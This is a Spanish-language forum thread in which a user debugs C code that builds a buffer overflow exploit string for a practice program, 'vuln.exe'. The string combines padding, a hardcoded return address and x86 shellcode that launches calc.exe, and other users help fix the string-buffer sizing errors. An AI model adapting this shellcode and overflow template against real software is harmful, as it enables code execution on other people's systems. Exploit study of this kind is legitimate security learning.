Hola a todos estoy intentando programar mis propias shellcode:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void main(int argc, char *argv[]) {
char relleno[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char offset[] = "\xED\x1E\x95\x7C";
char exploit[] = "\x55\x8B\xEC\x83\xEC\x0C\x32\xD2\xC6\x45\xF4\x63\xC6\x45\xF5\x61\xC6\x45\xF6\x6C\xC6\x45\xF7\x63\xC6\x45\xF8\x2E\xC6\x45\xF9\x65"
"\xC6\x45\xFA\x78\xC6\x45\xFB\x65\x88\x55\xFC\x8D\x45\xF4\x6A\x01\x50\xBB\x4D\x11\x86\x7C\xFF\xD3\x8B\xE5\x5D";
strcat(offset,exploit);
strcat(relleno,offset);
//argv[0] = "vuln1";
//argv[1] = relleno;
//argv[2] = NULL;
//execv ("vuln.exe",argv);
}
El problema está en la segunda concatenación, esta genera errores al momento de ejecutar, ¿cual podría ser el problema?, saludos y gracias.
En exploit has puesto dos cadenas seguidas.
Quita las comillas y ponlas en una sola.
El error persiste, ¿a que se podría deber?, saludos.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void main(int argc, char *argv[]) {
char relleno[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char offset[] = "\xED\x1E\x95\x7C";
char exploit[] = "\x55\x8B\xEC\x83\xEC\x0C\x32\xD2\xC6\x45\xF4\x63\xC6\x45\xF5\x61\xC6\x45\xF6\x6C\xC6\x45\xF7\x63\xC6\x45\xF8\x2E\xC6\x45\xF9\x65\xC6\x45\xFA\x78\xC6\x45\xFB\x65\x88\x55\xFC\x8D\x45\xF4\x6A\x01\x50\xBB\x4D\x11\x86\x7C\xFF\xD3\x8B\xE5\x5D";
strcat(offset,exploit);
strcat(relleno,offset);
//argv[0] = "vuln1";
//argv[1] = relleno;
//argv[2] = NULL;
//execv ("vuln.exe",argv);
}
Bueno que no has reservado memoria suficiente.
Me explico, offset tendrá 5-6 bytes y le quieres meter 30 más. Como solo has reservado 5 te da error.
Prueba reservando muchos:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
char relleno[250] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char offset[250] = "\xED\x1E\x95\x7C";
char exploit[250] = "\x55\x8B\xEC\x83\xEC\x0C\x32\xD2\xC6\x45\xF4\x63\xC6\x45\xF5\x61\xC6\x45\xF6\x6C\xC6\x45\xF7\x63\xC6\x45\xF8\x2E\xC6\x45\xF9\x65\xC6\x45\xFA\x78\xC6\x45\xFB\x65\x88\x55\xFC\x8D\x45\xF4\x6A\x01\x50\xBB\x4D\x11\x86\x7C\xFF\xD3\x8B\xE5\x5D";
strcat(offset,exploit);
strcat(relleno,offset);
//argv[0] = "vuln1";
//argv[1] = relleno;
//argv[2] = NULL;
//execv ("vuln.exe",argv);
getchar();
return 0;
}
Era tal como lo comentabas, adjunto el código funcional:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void main(int argc, char *argv[]) {
char relleno[1024] ="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char offset[] = "\xED\x1E\x95\x7C";
char exploit[] = "\x55\x8B\xEC\x83\xEC\x0C\x32\xD2\xC6\x45\xF4\x63\xC6\x45\xF5\x61\xC6\x45\xF6\x6C\xC6\x45\xF7\x63\xC6\x45\xF8\x2E\xC6\x45\xF9\x65\xC6\x45\xFA\x78\xC6\x45\xFB\x65\x88\x55\xFC\x8D\x45\xF4\x6A\x01\x50\xBB\x4D\x11\x86\x7C\xFF\xD3\x8B\xE5\x5D";
strcat(relleno,offset);
strcat(relleno,exploit);
//argv[0] = "vuln1";
//argv[1] = relleno;
//argv[2] = NULL;
//execv ("vuln.exe",argv);
}
Muchas gracias, saludos.